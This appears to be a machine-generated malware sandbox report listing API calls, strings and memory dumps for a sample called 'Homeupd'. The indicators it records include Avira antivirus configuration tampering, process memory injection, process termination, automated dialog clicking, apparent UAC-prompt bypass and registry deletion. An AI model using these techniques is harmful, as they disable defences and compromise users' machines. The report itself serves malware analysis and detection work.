    • lstrcpyA.KERNEL32(?,?), ref: 018F3C4A
    • lstrcatA.KERNEL32(?,\TEMP\avwin.ini), ref: 018F3C5E
    • DeleteFileA.KERNEL32(?), ref: 018F3C67
      • Part of subcall function 018F17A4: CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000), ref: 018F17BF
      • Part of subcall function 018F17A4: WriteFile.KERNEL32(00000000,?,018F3B8B,?,00000000), ref: 018F17DA
      • Part of subcall function 018F17A4: FlushFileBuffers.KERNEL32(00000000), ref: 018F17F1
      • Part of subcall function 018F17A4: CloseHandle.KERNEL32(00000000), ref: 018F17F8
      • Part of subcall function 018F17A4: GetLastError.KERNEL32(?,?,?,018F3B8B,?,?,00000001,?,80000002), ref: 018F1808
    • lstrcpyA.KERNEL32(?,018F6624), ref: 018F3CA1
    • lstrcatA.KERNEL32(?,?), ref: 018F3CB1
    • lstrcatA.KERNEL32(?,avconfig.exe" /SAVEAVWININI="avwin.ini;"), ref: 018F3CBF
      • Part of subcall function 018F33C1: wvsprintfA.USER32(?,?,018F3B52), ref: 018F342D
      • Part of subcall function 018F33C1: LoadLibraryA.KERNEL32(Kernel32.dll), ref: 018F3461
      • Part of subcall function 018F33C1: GetProcAddress.KERNEL32(00000000), ref: 018F346A
      • Part of subcall function 018F33C1: LoadLibraryA.KERNEL32(Shlwapi.dll), ref: 018F3477
      • Part of subcall function 018F33C1: GetProcAddress.KERNEL32(00000000), ref: 018F347A
      • Part of subcall function 018F33C1: PathGetArgsA.SHLWAPI(?), ref: 018F34A9
      • Part of subcall function 018F33C1: lstrcpynA.KERNEL32(?,00000000,?,?,?,?,?,?,?,00000104,7C834D71), ref: 018F34B7
      • Part of subcall function 018F33C1: ShellExecuteExA.SHELL32(?,?,?,?,?,?,?,?,?,?,?,00000104,7C834D71), ref: 018F3509
      • Part of subcall function 018F33C1: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000104,7C834D71), ref: 018F3519
    Strings
    • \TEMP\avwin.ini, xrefs: 018F3C52
    • avconfig.exe" /SAVEAVWININI="avwin.ini;", xrefs: 018F3CB3
    • SOFTWARE\Avira\Antivir Desktop, xrefs: 018F3BE7
    • Path, xrefs: 018F3C0A
    • ########################################################## $AV$CONFIGURATION$INI##############################################, xrefs: 018F3C78
    • AppDataDirectory, xrefs: 018F3BE2
    • SOFTWARE\Avira\Antivir Desktop, xrefs: 018F3C0F
    APIs
    • GetTempPathA.KERNEL32(00000104,?), ref: 018F2814
    • lstrcatA.KERNEL32(?,018F6800,?,?,00000000), ref: 018F282C
    • lstrcatA.KERNEL32(?,018F3251,?,?,00000000), ref: 018F2838
      • Part of subcall function 018F2743: CreateFileA.KERNEL32(018F3EC4,C0000000,00000000,00000000,00000002,00000000,00000000), ref: 018F275B
      • Part of subcall function 018F2743: GetProcessHeap.KERNEL32 ref: 018F2773
      • Part of subcall function 018F2743: HeapAlloc.KERNEL32(00000000,?,?,?,?,018F2856,?,018F8000,00005A00,018F3EC4,00000022,?,?,00000000), ref: 018F2776
      • Part of subcall function 018F2743: SetFilePointer.KERNEL32(00000022,00000000,00000000,00000000), ref: 018F27A3
      • Part of subcall function 018F2743: WriteFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 018F27B4
      • Part of subcall function 018F2743: GetProcessHeap.KERNEL32 ref: 018F27BF
      • Part of subcall function 018F2743: HeapFree.KERNEL32(00000000,?,?,00000000), ref: 018F27C2
      • Part of subcall function 018F2743: CloseHandle.KERNEL32(?), ref: 018F27CB
    • CreateThread.KERNEL32(00000000,00000000,j,00000000), ref: 018F2894
    • CloseHandle.KERNEL32(00000000), ref: 018F289B
    • lstrcatA.KERNEL32(?,018F6804,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 018F28AD
    • lstrcatA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 018F28B9
    • lstrcatA.KERNEL32(?,018F6808,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 018F28C7
    • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,018F2917), ref: 018F28DF
    • Sleep.KERNEL32(00001388), ref: 018F28F2
    Strings
    APIs
      • Part of subcall function 018F1385: GetModuleHandleA.KERNEL32(kernel32), ref: 018F1398
      • Part of subcall function 018F1385: GetProcAddress.KERNEL32(00000000), ref: 018F139F
      • Part of subcall function 018F3212: LoadLibraryA.KERNEL32(user32.dll), ref: 018F3217
      • Part of subcall function 018F3212: GetModuleHandleA.KERNEL32(kernel32.dll), ref: 018F3227
      • Part of subcall function 018F3212: GetProcAddress.KERNEL32(00000000), ref: 018F322E
      • Part of subcall function 018F2B31: GetVersionExA.KERNEL32(?), ref: 018F2B4B
      • Part of subcall function 018F2CBE: LoadLibraryA.KERNEL32(ntdll.dll), ref: 018F2CD5
      • Part of subcall function 018F2CBE: GetLastError.KERNEL32(?,00000000), ref: 018F2CE0
      • Part of subcall function 018F2CBE: GetProcAddress.KERNEL32(00000000,ZwQuerySystemInformation), ref: 018F2CF2
      • Part of subcall function 018F2CBE: GetLastError.KERNEL32(?,00000000), ref: 018F2CFD
      • Part of subcall function 018F2CBE: GetProcAddress.KERNEL32(00000000,ZwAllocateVirtualMemory), ref: 018F2D09
      • Part of subcall function 018F2CBE: GetLastError.KERNEL32(?,00000000), ref: 018F2D14
      • Part of subcall function 018F2CBE: LoadLibraryA.KERNEL32(?), ref: 018F2D30
      • Part of subcall function 018F2CBE: GetLastError.KERNEL32(?,00000000), ref: 018F2D38
      • Part of subcall function 018F2CBE: GetProcAddress.KERNEL32(00000000,PsLookupProcessByProcessId), ref: 018F2D44
      • Part of subcall function 018F2CBE: GetCurrentProcessId.KERNEL32 ref: 018F2D4F
      • Part of subcall function 018F2CBE: FreeLibrary.KERNEL32(?), ref: 018F2D67
    • CreateThread.KERNEL32(00000000,00000000,018F30E3,00000000), ref: 018F328F
    • WaitForSingleObject.KERNEL32(00000000,000493E0), ref: 018F32A8
    • TerminateThread.KERNEL32(?,00000000), ref: 018F32B2
    • CreateThread.KERNEL32(00000000,00000000,j,00000000), ref: 018F32F8
    • CloseHandle.KERNEL32(00000000), ref: 018F3301
    • CreateProcessA.KERNEL32(00000000,018F3EC4,00000000,00000000,00000000,00000000,00000000,00000000,00000044,018F3386), ref: 018F3315
    • WaitForSingleObject.KERNEL32(018F3386,0000EA60), ref: 018F3334
    • CloseHandle.KERNEL32(018F3386), ref: 018F3339
    • CloseHandle.KERNEL32(018F3EC4), ref: 018F333E
    Strings
    APIs
    • GetModuleHandleA.KERNEL32(00000000), ref: 018F215C
    • VirtualFreeEx.KERNEL32(?,00000000,00000000,00008000), ref: 018F2175
    • VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040), ref: 018F2187
    • VirtualQueryEx.KERNEL32(?,00000000,?,0000001C), ref: 018F21AB
    • VirtualProtectEx.KERNEL32(?,018F22DF,00001000,00000040,?), ref: 018F21DD
    • WriteProcessMemory.KERNEL32(?,018F22DF,018F22DF,00001000,?), ref: 018F21ED
    • VirtualQueryEx.KERNEL32(?,018F22DF,?,0000001C), ref: 018F2211
    • LoadLibraryA.KERNEL32(ntdll.dll), ref: 018F2223
    • GetProcAddress.KERNEL32(00000000), ref: 018F222A
    Strings
    APIs
      • Part of subcall function 018F191D: GetTempPathA.KERNEL32(00000104,?), ref: 018F1950
      • Part of subcall function 018F191D: lstrcatA.KERNEL32(?,\..\..\LocalLow\), ref: 018F1962
      • Part of subcall function 018F191D: GetEnvironmentVariableA.KERNEL32(username,?,000000FF), ref: 018F1979
      • Part of subcall function 018F191D: wsprintfA.USER32(00000000,%s\cmd.%s.bat,?,?), ref: 018F1995
    • lstrcpynA.KERNEL32(?,?,00000104,?,00000000), ref: 018F19E9
    • GetModuleHandleA.KERNEL32(00000000), ref: 018F19F3
    • GetModuleFileNameA.KERNEL32(00000000,?,00000000), ref: 018F19FA
    • wsprintfA.USER32(?,start "" "%s",?,?,00000000), ref: 018F1A13
    • CreateFileA.KERNEL32(00000000,40000000,00000001,00000000,00000002,00000000,00000000), ref: 018F1A2B
    • GetLastError.KERNEL32 ref: 018F1A38
    • lstrlenA.KERNEL32(?,00000000), ref: 018F1A48
    • WriteFile.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 018F1A5E
    • GetLastError.KERNEL32 ref: 018F1A6D
    • CloseHandle.KERNEL32(00000000), ref: 018F1A76
    Strings
    APIs
    • RegisterClassA.USER32(?), ref: 018F3133
    • CreateWindowExA.USER32(00000000,018F6B4C,00000000,00000000,000000FF,000000FF,00000000,00000000,00000000,00000000,00000000,00000000), ref: 018F3149
    • Sleep.KERNEL32(00000190), ref: 018F3161
      • Part of subcall function 018F2F39: GetLastError.KERNEL32(00000000,?,?,?,018F3172,?), ref: 018F2F51
      • Part of subcall function 018F2F39: GetLastError.KERNEL32(00000000,?,?,?,018F3172,?), ref: 018F2F5C
      • Part of subcall function 018F2F39: GetCurrentProcess.KERNEL32 ref: 018F2F6F
      • Part of subcall function 018F2F39: GetLastError.KERNEL32(?,?,018F3172,?), ref: 018F2F8F
    • GetCurrentThreadId.KERNEL32 ref: 018F318E
    • SetWindowsHookExA.USER32(00000004,018F3084,00000000,00000000), ref: 018F3199
    • TrackPopupMenu.USER32(00000000,00000000,FFFFD8F0,FFFFD8F0,00000000,?,00000000), ref: 018F31B1
    • PostMessageA.USER32(?,00000000,00000000,00000000), ref: 018F31C1
    • DestroyWindow.USER32(?), ref: 018F31D4
    • DestroyMenu.USER32(00000000), ref: 018F31DF
    • UnhookWindowsHook.USER32(00000004,018F3084), ref: 018F31E8
    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 018F31FE
      • Part of subcall function 018F2DAF: CreatePopupMenu.USER32 ref: 018F2DE2
      • Part of subcall function 018F2DAF: InsertMenuItemA.USER32(00000000,00000000,00000001,?), ref: 018F2DFA
      • Part of subcall function 018F2DAF: CreatePopupMenu.USER32 ref: 018F2E1F
      • Part of subcall function 018F2DAF: InsertMenuItemA.USER32(00000000,00000000,00000001,?), ref: 018F2E33
      • Part of subcall function 018F2DAF: DestroyMenu.USER32(00000000), ref: 018F2E44
      • Part of subcall function 018F2DAF: DestroyMenu.USER32(00000000), ref: 018F2E4B
      • Part of subcall function 018F2DAF: DestroyMenu.USER32(00000000), ref: 018F2E50
    APIs
    • CreatePopupMenu.USER32 ref: 018F2DE2
    • InsertMenuItemA.USER32(00000000,00000000,00000001,?), ref: 018F2DFA
    • CreatePopupMenu.USER32 ref: 018F2E1F
    • InsertMenuItemA.USER32(00000000,00000000,00000001,?), ref: 018F2E33
    • DestroyMenu.USER32(00000000), ref: 018F2E44
    • DestroyMenu.USER32(00000000), ref: 018F2E4B
    • DestroyMenu.USER32(00000000), ref: 018F2E50
    Memory Dump Source
    • Source File: 00000003.00000002.281653048.018F1000.00000020.sdmp, Offset: 018F0000, based on PE: true
    • Associated: 00000003.00000002.281647801.018F0000.00000002.sdmp
    • Associated: 00000003.00000002.281659353.018F5000.00000002.sdmp
    • Associated: 00000003.00000002.281664813.018F8000.00000004.sdmp
    • Associated: 00000003.00000002.281672336.01901000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_18f0000_Homeupd.jbxd
    APIs
    • GetClassNameA.USER32(?,?,00000032), ref: 018F1DA8
    • lstrcmpA.KERNEL32(#32770,00000000), ref: 018F1DBB
    • GetWindowLongA.USER32(?,000000F0), ref: 018F1DCF
    • GetWindowLongA.USER32(?,000000EC), ref: 018F1DDB
    • SetActiveWindow.USER32(?), ref: 018F1DE5
    • GetDlgItem.USER32(?,0000114A), ref: 018F1DF1
    • SendMessageA.USER32(00000000,000000F5,00000000,00000000), ref: 018F1E05
    • Sleep.KERNEL32(00000064), ref: 018F1E0D
    Memory Dump Source
    • Source File: 00000003.00000002.281653048.018F1000.00000020.sdmp, Offset: 018F0000, based on PE: true
    • Associated: 00000003.00000002.281647801.018F0000.00000002.sdmp
    • Associated: 00000003.00000002.281659353.018F5000.00000002.sdmp
    • Associated: 00000003.00000002.281664813.018F8000.00000004.sdmp
    • Associated: 00000003.00000002.281672336.01901000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_18f0000_Homeupd.jbxd
    APIs
    • GetCurrentProcess.KERNEL32 ref: 018F15D3
    • OpenProcessToken.ADVAPI32(00000000,00000008,?), ref: 018F15E0
    • GetTokenInformation.ADVAPI32(?,00000019,00000000,00000000,018F3EB4), ref: 018F1600
    • GetLastError.KERNEL32(?,?,?,?,?,018F3EB4), ref: 018F1606
    • LocalAlloc.KERNEL32(00000000,018F3EB4), ref: 018F1616
    • GetTokenInformation.ADVAPI32(?,00000019,00000000,018F3EB4,018F3EB4), ref: 018F162F
    • GetSidSubAuthorityCount.ADVAPI32(00000000,?,?,?,?,?,018F3EB4), ref: 018F1637
    • GetSidSubAuthority.ADVAPI32(00000000,?,?,?,?,?,?,018F3EB4), ref: 018F1647
    • LocalFree.KERNEL32(00000000), ref: 018F167D
    • CloseHandle.KERNEL32(?), ref: 018F1687
    Memory Dump Source
    • Source File: 00000003.00000002.281653048.018F1000.00000020.sdmp, Offset: 018F0000, based on PE: true
    • Associated: 00000003.00000002.281647801.018F0000.00000002.sdmp
    • Associated: 00000003.00000002.281659353.018F5000.00000002.sdmp
    • Associated: 00000003.00000002.281664813.018F8000.00000004.sdmp
    • Associated: 00000003.00000002.281672336.01901000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_18f0000_Homeupd.jbxd
    APIs
      • Part of subcall function 018F186F: lstrcpyA.KERNEL32(018F3554,018FF6B8,?,018F189F,018F3554,018FF6B8,?,?,?,018F3554,?), ref: 018F187A
      • Part of subcall function 018F186F: lstrcatA.KERNEL32(018F3554,00000000,?,018F189F,018F3554,018FF6B8,?,?,?,018F3554,?), ref: 018F1889
    • CreateFileA.KERNEL32(018F3554,40000000,00000001,00000000,00000002,00000000,00000000), ref: 018F18B1
    • WriteFile.KERNEL32(00000000,018FF400,0000020E,?,00000000), ref: 018F18D5
    • FlushFileBuffers.KERNEL32(00000000), ref: 018F18DE
    • WriteFile.KERNEL32(00000000, RECTEXE,0000006C,?,00000000), ref: 018F190A
    • FlushFileBuffers.KERNEL32(00000000), ref: 018F190D
    • CloseHandle.KERNEL32(00000000), ref: 018F1910
    Memory Dump Source
    • Source File: 00000003.00000002.281653048.018F1000.00000020.sdmp, Offset: 018F0000, based on PE: true
    • Associated: 00000003.00000002.281647801.018F0000.00000002.sdmp
    • Associated: 00000003.00000002.281659353.018F5000.00000002.sdmp
    • Associated: 00000003.00000002.281664813.018F8000.00000004.sdmp
    • Associated: 00000003.00000002.281672336.01901000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_18f0000_Homeupd.jbxd
    APIs
    • LoadLibraryA.KERNEL32(advapi32.dll), ref: 018F11C8
    • GetProcAddress.KERNEL32(00000000), ref: 018F11CF
    • RegOpenKeyExA.ADVAPI32(80000002,018F36A0,00000000,00020106,?), ref: 018F11EE
    • RegDeleteKeyA.ADVAPI32(80000002,018F36A0), ref: 018F1215
    • RegCloseKey.ADVAPI32(?), ref: 018F1220
    Memory Dump Source
    • Source File: 00000003.00000002.281653048.018F1000.00000020.sdmp, Offset: 018F0000, based on PE: true
    • Associated: 00000003.00000002.281647801.018F0000.00000002.sdmp
    • Associated: 00000003.00000002.281659353.018F5000.00000002.sdmp
    • Associated: 00000003.00000002.281664813.018F8000.00000004.sdmp
    • Associated: 00000003.00000002.281672336.01901000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_18f0000_Homeupd.jbxd
    APIs
    • GetTempPathA.KERNEL32(00000104,?), ref: 018F1950
    • lstrcatA.KERNEL32(?,\..\..\LocalLow\), ref: 018F1962
    • GetEnvironmentVariableA.KERNEL32(username,?,000000FF), ref: 018F1979
    • wsprintfA.USER32(00000000,%s\cmd.%s.bat,?,?), ref: 018F1995
    Memory Dump Source
    • Source File: 00000003.00000002.281653048.018F1000.00000020.sdmp, Offset: 018F0000, based on PE: true
    • Associated: 00000003.00000002.281647801.018F0000.00000002.sdmp
    • Associated: 00000003.00000002.281659353.018F5000.00000002.sdmp
    • Associated: 00000003.00000002.281664813.018F8000.00000004.sdmp
    • Associated: 00000003.00000002.281672336.01901000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_18f0000_Homeupd.jbxd
    APIs
    • CreateFileA.KERNEL32(018F3EC4,C0000000,00000000,00000000,00000002,00000000,00000000), ref: 018F275B
    • GetProcessHeap.KERNEL32 ref: 018F2773
    • HeapAlloc.KERNEL32(00000000,?,?,?,?,018F2856,?,018F8000,00005A00,018F3EC4,00000022,?,?,00000000), ref: 018F2776
    • SetFilePointer.KERNEL32(00000022,00000000,00000000,00000000), ref: 018F27A3
    • WriteFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 018F27B4
    • GetProcessHeap.KERNEL32 ref: 018F27BF
    • HeapFree.KERNEL32(00000000,?,?,00000000), ref: 018F27C2
    • CloseHandle.KERNEL32(?), ref: 018F27CB
    Memory Dump Source
    • Source File: 00000003.00000002.281653048.018F1000.00000020.sdmp, Offset: 018F0000, based on PE: true
    • Associated: 00000003.00000002.281647801.018F0000.00000002.sdmp
    • Associated: 00000003.00000002.281659353.018F5000.00000002.sdmp
    • Associated: 00000003.00000002.281664813.018F8000.00000004.sdmp
    • Associated: 00000003.00000002.281672336.01901000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_18f0000_Homeupd.jbxd
    APIs
    • CreateToolhelp32Snapshot.KERNEL32(0000000F,00000000), ref: 018F1554
    • Process32First.KERNEL32(00000000,?), ref: 018F156D
    • lstrcmpA.KERNEL32(?,018F26D1,00000000,0000000F,00000000,00000000,00000000), ref: 018F1587
    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 018F159A
    • TerminateProcess.KERNEL32(00000000,00000009), ref: 018F15A9
    • CloseHandle.KERNEL32(00000000), ref: 018F15B0
    • Process32Next.KERNEL32(00000000,00000128), ref: 018F15BA
    • CloseHandle.KERNEL32(00000000), ref: 018F15C5
    Memory Dump Source
    • Source File: 00000003.00000002.281653048.018F1000.00000020.sdmp, Offset: 018F0000, based on PE: true
    • Associated: 00000003.00000002.281647801.018F0000.00000002.sdmp
    • Associated: 00000003.00000002.281659353.018F5000.00000002.sdmp
    • Associated: 00000003.00000002.281664813.018F8000.00000004.sdmp
    • Associated: 00000003.00000002.281672336.01901000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_18f0000_Homeupd.jbxd
    APIs
      • Part of subcall function 018F122C: RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,?), ref: 018F1244
      • Part of subcall function 018F122C: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,00000000), ref: 018F126F
      • Part of subcall function 018F122C: RegCloseKey.ADVAPI32(?), ref: 018F127A
    • Sleep.KERNEL32(00000064), ref: 018F1ABD
    • lstrcmpiA.KERNEL32(?,TRUE,?,?,?,?,?,00000000), ref: 018F1AFB
    Strings
    • SOFTWARE\Microsoft\Windows NT\CurrentVersion\, xrefs: 018F1AA9
    • marker_gjru_fbegrihlgm, xrefs: 018F1AA4
    • TRUE, xrefs: 018F1AEF
    • SOFTWARE\Microsoft\Windows NT\CurrentVersion\, xrefs: 018F1AD6
    • marker_gjru_fbegrihlgm, xrefs: 018F1AD1
    Memory Dump Source
    • Source File: 00000003.00000002.281653048.018F1000.00000020.sdmp, Offset: 018F0000, based on PE: true
    • Associated: 00000003.00000002.281647801.018F0000.00000002.sdmp
    • Associated: 00000003.00000002.281659353.018F5000.00000002.sdmp
    • Associated: 00000003.00000002.281664813.018F8000.00000004.sdmp
    • Associated: 00000003.00000002.281672336.01901000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_18f0000_Homeupd.jbxd
    APIs
      • Part of subcall function 018F1385: GetModuleHandleA.KERNEL32(kernel32), ref: 018F1398
      • Part of subcall function 018F1385: GetProcAddress.KERNEL32(00000000), ref: 018F139F
    • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 018F2AEB
    • GetProcAddress.KERNEL32(00000000), ref: 018F2AF2
    • GetSystemInfo.KERNEL32(?), ref: 018F2B04
    • GetVersionExA.KERNEL32(0000009C), ref: 018F2B11
    Memory Dump Source
    • Source File: 00000003.00000002.281653048.018F1000.00000020.sdmp, Offset: 018F0000, based on PE: true
    • Associated: 00000003.00000002.281647801.018F0000.00000002.sdmp
    • Associated: 00000003.00000002.281659353.018F5000.00000002.sdmp
    • Associated: 00000003.00000002.281664813.018F8000.00000004.sdmp
    • Associated: 00000003.00000002.281672336.01901000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_18f0000_Homeupd.jbxd
    APIs
      • Part of subcall function 018F1385: GetModuleHandleA.KERNEL32(kernel32), ref: 018F1398
      • Part of subcall function 018F1385: GetProcAddress.KERNEL32(00000000), ref: 018F139F
    • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 018F2A5C
    • GetProcAddress.KERNEL32(00000000), ref: 018F2A63
    • GetSystemInfo.KERNEL32(?), ref: 018F2A75
    • GetVersionExA.KERNEL32(0000009C), ref: 018F2A82
    Memory Dump Source
    • Source File: 00000003.00000002.281653048.018F1000.00000020.sdmp, Offset: 018F0000, based on PE: true
    • Associated: 00000003.00000002.281647801.018F0000.00000002.sdmp
    • Associated: 00000003.00000002.281659353.018F5000.00000002.sdmp
    • Associated: 00000003.00000002.281664813.018F8000.00000004.sdmp
    • Associated: 00000003.00000002.281672336.01901000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_18f0000_Homeupd.jbxd
    APIs
      • Part of subcall function 018F1385: GetModuleHandleA.KERNEL32(kernel32), ref: 018F1398
      • Part of subcall function 018F1385: GetProcAddress.KERNEL32(00000000), ref: 018F139F
    • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 018F2099
    • GetProcAddress.KERNEL32(00000000), ref: 018F20A0
    • GetSystemInfo.KERNEL32(?), ref: 018F20B2
    • GetVersionExA.KERNEL32(0000009C), ref: 018F20BF
    Memory Dump Source
    • Source File: 00000003.00000002.281653048.018F1000.00000020.sdmp, Offset: 018F0000, based on PE: true
    • Associated: 00000003.00000002.281647801.018F0000.00000002.sdmp
    • Associated: 00000003.00000002.281659353.018F5000.00000002.sdmp
    • Associated: 00000003.00000002.281664813.018F8000.00000004.sdmp
    • Associated: 00000003.00000002.281672336.01901000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_18f0000_Homeupd.jbxd
    APIs
    • GetCurrentThreadId.KERNEL32 ref: 018F300F
    • SetWindowsHookExA.USER32(00000009,Function_00002C80,00000000,00000000), ref: 018F3020
    • SendMessageA.USER32(?,00000000,00900516,00000000), ref: 018F3032
    • UnhookWindowsHook.USER32(00000009,Function_00002C80), ref: 018F303B
    • EndMenu.USER32 ref: 018F304B
    • EndMenu.USER32 ref: 018F305F
    • CallWindowProcA.USER32(?,?,?,?), ref: 018F307A
    Memory Dump Source
    • Source File: 00000003.00000002.281653048.018F1000.00000020.sdmp, Offset: 018F0000, based on PE: true
    • Associated: 00000003.00000002.281647801.018F0000.00000002.sdmp
    • Associated: 00000003.00000002.281659353.018F5000.00000002.sdmp
    • Associated: 00000003.00000002.281664813.018F8000.00000004.sdmp
    • Associated: 00000003.00000002.281672336.01901000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_18f0000_Homeupd.jbxd
    APIs
    • LoadLibraryA.KERNEL32(user32.dll), ref: 018F3217
    • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 018F3227
    • GetProcAddress.KERNEL32(00000000), ref: 018F322E
    Memory Dump Source
    • Source File: 00000003.00000002.281653048.018F1000.00000020.sdmp, Offset: 018F0000, based on PE: true
    • Associated: 00000003.00000002.281647801.018F0000.00000002.sdmp
    • Associated: 00000003.00000002.281659353.018F5000.00000002.sdmp
    • Associated: 00000003.00000002.281664813.018F8000.00000004.sdmp
    • Associated: 00000003.00000002.281672336.01901000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_18f0000_Homeupd.jbxd
    APIs
    • LocalAlloc.KERNEL32(00000040,?), ref: 018F2BF9
    • GetLastError.KERNEL32(?,00000000), ref: 018F2C05
    • StrStrIA.SHLWAPI(00000020,018F69EC), ref: 018F2C33
    • StrStrIA.SHLWAPI(00000020,exe), ref: 018F2C42
    • LocalFree.KERNEL32(00000000), ref: 018F2C72
    Memory Dump Source
    • Source File: 00000003.00000002.281653048.018F1000.00000020.sdmp, Offset: 018F0000, based on PE: true
    • Associated: 00000003.00000002.281647801.018F0000.00000002.sdmp
    • Associated: 00000003.00000002.281659353.018F5000.00000002.sdmp
    • Associated: 00000003.00000002.281664813.018F8000.00000004.sdmp
    • Associated: 00000003.00000002.281672336.01901000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_18f0000_Homeupd.jbxd
    APIs
    • GetModuleHandleA.KERNEL32(kernel32), ref: 018F14F3
    • GetProcAddress.KERNEL32(00000000), ref: 018F14FA
    • GetCurrentProcess.KERNEL32 ref: 018F1515
    Memory Dump Source
    • Source File: 00000003.00000002.281653048.018F1000.00000020.sdmp, Offset: 018F0000, based on PE: true
    • Associated: 00000003.00000002.281647801.018F0000.00000002.sdmp
    • Associated: 00000003.00000002.281659353.018F5000.00000002.sdmp
    • Associated: 00000003.00000002.281664813.018F8000.00000004.sdmp
    • Associated: 00000003.00000002.281672336.01901000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_18f0000_Homeupd.jbxd
    APIs
    • CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000), ref: 018F17BF
    • WriteFile.KERNEL32(00000000,?,018F3B8B,?,00000000), ref: 018F17DA
    • FlushFileBuffers.KERNEL32(00000000), ref: 018F17F1
    • CloseHandle.KERNEL32(00000000), ref: 018F17F8
    • GetLastError.KERNEL32(?,?,?,018F3B8B,?,?,00000001,?,80000002), ref: 018F1808
    Memory Dump Source
    • Source File: 00000003.00000002.281653048.018F1000.00000020.sdmp, Offset: 018F0000, based on PE: true
    • Associated: 00000003.00000002.281647801.018F0000.00000002.sdmp
    • Associated: 00000003.00000002.281659353.018F5000.00000002.sdmp
    • Associated: 00000003.00000002.281664813.018F8000.00000004.sdmp
    • Associated: 00000003.00000002.281672336.01901000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_18f0000_Homeupd.jbxd
    APIs
    • GetModuleHandleA.KERNEL32(kernel32), ref: 018F1398
    • GetProcAddress.KERNEL32(00000000), ref: 018F139F
    Memory Dump Source
    • Source File: 00000003.00000002.281653048.018F1000.00000020.sdmp, Offset: 018F0000, based on PE: true
    • Associated: 00000003.00000002.281647801.018F0000.00000002.sdmp
    • Associated: 00000003.00000002.281659353.018F5000.00000002.sdmp
    • Associated: 00000003.00000002.281664813.018F8000.00000004.sdmp
    • Associated: 00000003.00000002.281672336.01901000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_18f0000_Homeupd.jbxd
    APIs
    • GetClassNameA.USER32(?,?,00000032), ref: 018F1B8B
    • lstrcmpA.KERNEL32($$$Secure UAP,00000000), ref: 018F1B9E
    • SwitchToThisWindow.USER32(?,00000001), ref: 018F1BAD
    Memory Dump Source
    • Source File: 00000003.00000002.281653048.018F1000.00000020.sdmp, Offset: 018F0000, based on PE: true
    • Associated: 00000003.00000002.281647801.018F0000.00000002.sdmp
    • Associated: 00000003.00000002.281659353.018F5000.00000002.sdmp
    • Associated: 00000003.00000002.281664813.018F8000.00000004.sdmp
    • Associated: 00000003.00000002.281672336.01901000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_18f0000_Homeupd.jbxd
    APIs
    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 018F12F9
    • Process32FirstW.KERNEL32(00000000,?), ref: 018F1330
    • lstrcmpiW.KERNEL32(?,00000000), ref: 018F1343
    • Process32NextW.KERNEL32(00000000,0000022C), ref: 018F1356
    Memory Dump Source
    • Source File: 00000003.00000002.281653048.018F1000.00000020.sdmp, Offset: 018F0000, based on PE: true
    • Associated: 00000003.00000002.281647801.018F0000.00000002.sdmp
    • Associated: 00000003.00000002.281659353.018F5000.00000002.sdmp
    • Associated: 00000003.00000002.281664813.018F8000.00000004.sdmp
    • Associated: 00000003.00000002.281672336.01901000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_18f0000_Homeupd.jbxd
    APIs
    • RegOpenKeyExA.ADVAPI32(018F3EC4,?,00000000,00020119,018F3EC4), ref: 018F293D
    • StrStrIA.SHLWAPI(?,00000000), ref: 018F2961
    • RegEnumKeyA.ADVAPI32(018F3EC4,00000000,?,00000104), ref: 018F297B
    • RegCloseKey.ADVAPI32(018F3EC4), ref: 018F2984
    Memory Dump Source
    • Source File: 00000003.00000002.281653048.018F1000.00000020.sdmp, Offset: 018F0000, based on PE: true
    • Associated: 00000003.00000002.281647801.018F0000.00000002.sdmp
    • Associated: 00000003.00000002.281659353.018F5000.00000002.sdmp
    • Associated: 00000003.00000002.281664813.018F8000.00000004.sdmp
    • Associated: 00000003.00000002.281672336.01901000.00000002.sdmp
